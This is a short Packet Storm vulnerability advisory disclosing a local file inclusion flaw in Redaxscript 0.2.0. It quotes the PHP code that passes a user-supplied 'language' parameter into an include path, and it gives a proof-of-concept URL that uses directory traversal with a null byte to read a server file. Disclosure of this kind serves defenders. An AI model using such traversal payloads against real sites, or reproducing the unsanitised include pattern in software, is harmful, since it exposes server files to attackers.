Redaxscript 0.2.0 Local File Inclusion

2009-04-11T00:00:00
ID PACKETSTORM:76542
Type packetstorm
Reporter SirGod
Modified 2009-04-11T00:00:00

Description

                                        
                                            `##################################################################################  
[+] Redaxscript 0.2.0 (index.php language) Local File Inclusion Vulnerability  
[+] Discovered By SirGod  
[+] www.mortal-team.org  
[+] www.h4cky0u.org  
##################################################################################  
  
[+] Local File Inclusion  
  
index.php :  
  
-----------------------------------------------------------------  
include('template/'.$_SESSION[_root.'template'].'/index.php');  
-----------------------------------------------------------------  
  
function.php :  
  
-----------------------------------------------------------------  
if($_GET['language']) {  
$_SESSION[_root.'language'] = $_GET['language'];  
-----------------------------------------------------------------  
  
- PoC :  
  
http://127.0.0.1/index.php?language=../../../../../BOOTSECT.BAK%00  
  
##################################################################################  
  
  
`